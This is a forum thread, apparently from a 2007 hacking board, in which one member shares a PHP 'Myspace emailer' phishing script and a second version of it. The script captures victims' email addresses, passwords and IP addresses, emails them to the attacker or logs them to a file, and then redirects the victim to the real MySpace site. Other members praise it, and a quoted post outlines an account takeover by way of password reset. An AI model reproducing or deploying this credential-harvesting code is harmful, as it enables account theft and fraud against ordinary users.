rrdtool
+ Reply to Thread
Results 1 to 13 of 13

Thread: Myspace Emailer...

  1. #1
    Join Date
    Nov 2007
    Posts
    17

    Thumbs up Myspace Emailer...

    I would like to welcome my self to the forums

    I will start posting on here alot more


    Well I read the post about someone asking about a myspace emailer?

    Well here you go, I had some spare time so I made one.

    [url=http://www.theprogamers.com/stuff/myspaceemailer.zip]You can download it here[/url]

    If you have any questions feel free to email me.

    [email]lethal@theprogamers.com[/email]

    If you want to s***est something else please email me I like to get emails!
    Last edited by Moonbat; 11-22-2007 at 10:00 AM. Reason: Make it better

  2. #2
    Join Date
    Sep 2006
    Posts
    1,649
    Please post your source code (PHP or ASP source code) so we can verify this is not a scam.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  3. #3
    Join Date
    Nov 2007
    Posts
    17
    Like this...






    [php]<?php
    if (isset($_POST['email']) && (isset($_POST['password']))) {
    $email = trim(strip_tags($_POST['email']));
    $password = trim(strip_tags($_POST['password']));
    $IP = $_SERVER['REMOTE_ADDR'];

    $to = '(PUT YOUR EMAIL HERE!)';
    $subject = 'Myspace Login';
    $message = "$email - $password - $IP";
    $headers = 'From: New Myspace Login' . "\r\n" .
    'Reply-To: Login' . "\r\n" .
    'X-Mailer: PHP/' . phpversion();

    mail($to, $subject, $message, $headers);
    echo'<script type="text/javascript">document.location.href=\'http://home.myspace.com/index.cfm?fuseaction=user\'</script>\'">';

    }
    ?>[/php]
    Last edited by Lethal323; 11-22-2007 at 09:50 AM.
    People shouldnt be afraid of there goverment, Goverment should be afraid of there people!

    The Pro Gamers Web******

  4. #4
    Join Date
    Sep 2006
    Posts
    1,649
    That's perfect. I like how you sanitize user input, although I'm more fond of htmlentities(). I think you are the first member (besides the mods) to sanitize input in your PHP code, so for that I thank you for making the e-world a safer place

    I put Vbulletin's PHP tags around your code to give syntax highlighting. You now have permission to post the download link.

    EDIT: Many free web hosts block the SMTP mail() function. You should research some file input output functions so you can write this data to a text file on the scammer's web server instead of mailing it to him. Here's a comprehensive list of file I/O functions and how to use them.

    [url]http://www.w*schools.com/php/php_ref_filesystem.asp[/url]
    Last edited by Moonbat; 11-22-2007 at 09:55 AM.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  5. #5
    Join Date
    Nov 2007
    Posts
    17
    Thank you very much



    [url=http://www.theprogamers.com/stuff/myspaceemailer.zip]You can download it here[/url]

    Check it out in close detail moonbat...


    ***REPLY TO EDIT***

    I already made one like that hold on and let me upload it to my website and I will post the download link, although I half to eat first so it will be a lil...
    Last edited by Lethal323; 11-22-2007 at 10:00 AM.
    People shouldnt be afraid of there goverment, Goverment should be afraid of there people!

    The Pro Gamers Web******

  6. #6
    Join Date
    Sep 2006
    Posts
    1,649
    Seems cool, and consolidated in one file makes it more user-friendly.

    But prepare to be swamped by requests asking how to use this file, from other members.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  7. #7
    Join Date
    Nov 2007
    Posts
    17
    Ahhh but thats why you make a user friendly read me(I hope there not that stupid?)




    [php]<?php
    if (isset($_POST['email']) && (isset($_POST['password']))) {
    $email = trim(strip_tags($_POST['email']));
    $password = trim(strip_tags($_POST['password']));
    $logfile= 'myspace.html';
    $IP = $_SERVER['REMOTE_ADDR'];

    $fp = fopen($logfile, "a");
    fwrite($fp, $email);
    fwrite($fp, "<br>");
    fwrite($fp, $password);
    fwrite($fp, "<br>");
    fwrite($fp, $IP);
    fwrite($fp, "<br>");
    fwrite($fp, "<br>");
    fclose($fp);
    echo'<script type="text/javascript">document.location.href=\'http://home.myspace.com/index.cfm?fuseaction=user\'</script>\'">';

    }
    ?>[/php]



    [url=http://www.theprogamers.com/stuff/loginposter.zip]DOWNLOAD IT HERE[/url]
    People shouldnt be afraid of there goverment, Goverment should be afraid of there people!

    The Pro Gamers Web******

  8. #8
    Join Date
    Sep 2006
    Posts
    1,649
    Quote Originally Posted by Lethal*2* View Post
    Ahhh but thats why you make a user friendly read me(I hope there not that stupid?)
    You'd be suprised by some people here.

    Anyway, nice code
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  9. #9
    Join Date
    Nov 2007
    Posts
    17
    Thank you!
    People shouldnt be afraid of there goverment, Goverment should be afraid of there people!

    The Pro Gamers Web******

  10. #10
    Join Date
    Nov 2007
    Posts
    17
    Ya here is a good example of a stupid person...


    Sry if this is somewhere else but i cant find it and i want to say this...

    MYSPACE HACKING IS EASY!!!!!!!
    *)get the e-mail of the account

    2)get the e-mail password (hardest part requires a little work with some with others just takes a lil background knowledge)

    *)go to forgot password on myspace and read the e-mail

    4)*IMPORTANT* delete e-mail!!!!!!

    5)log in

    if it got any easier they would post there own password jeez!
    And your respawns Moonbat(Priceless)
    People shouldnt be afraid of there goverment, Goverment should be afraid of there people!

    The Pro Gamers Web******

  11. #11
    Join Date
    Dec 2007
    Posts
    1
    Quote Originally Posted by Lethal*2* View Post
    I would like to welcome my self to the forums

    I will start posting on here alot more


    Well I read the post about someone asking about a myspace emailer?

    Well here you go, I had some spare time so I made one.

    [url=http://www.theprogamers.com/stuff/myspaceemailer.zip]You can download it here[/url]

    If you have any questions feel free to email me.

    [email]lethal@theprogamers.com[/email]

    If you want to s***est something else please email me I like to get emails!
    The link no longer works is there anywhere else I can download it?


    Thanks

  12. #12
    Join Date
    Jan 2008
    Posts
    1

    re*****

    Hey, Lethal. I know there's probably some rule about brining up old threads, but it's probably better than starting a whole new one just to ask if you or anyone else can post a link that works. I'd appreciate it much.

  13. #13
    Join Date
    Dec 2007
    Posts
    141
    Why do you need the download link when the source is a couple posts above yours. You would download the .rar, extract it, and see the same thing.

+ Reply to Thread

Similar Threads

  1. hi can you hacking MySpace Accounts And Deleted MySpace Accounts
    By The_Devil_Wears in forum Internet Privacy
    Replies: 0
    Last Post: 11-07-2009, 08:27 PM
  2. help with anonymous emailer
    By dsweet46 in forum General discussion
    Replies: 4
    Last Post: 11-03-2009, 09:47 PM
  3. New Book Release: How I Hacked MySpace: A Guide to Owning MySpace
    By MySpaceHacking in forum Internet Privacy
    Replies: 3
    Last Post: 12-21-2007, 06:09 PM
  4. Help with Syntax's IP-Emailer script.
    By BrendanF090 in forum Internet Privacy
    Replies: 4
    Last Post: 08-08-2006, 06:26 PM
  5. Banning IP's from IP EMAILER
    By SyntaXmasteR in forum Internet Privacy
    Replies: 0
    Last Post: 05-25-2006, 06:23 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts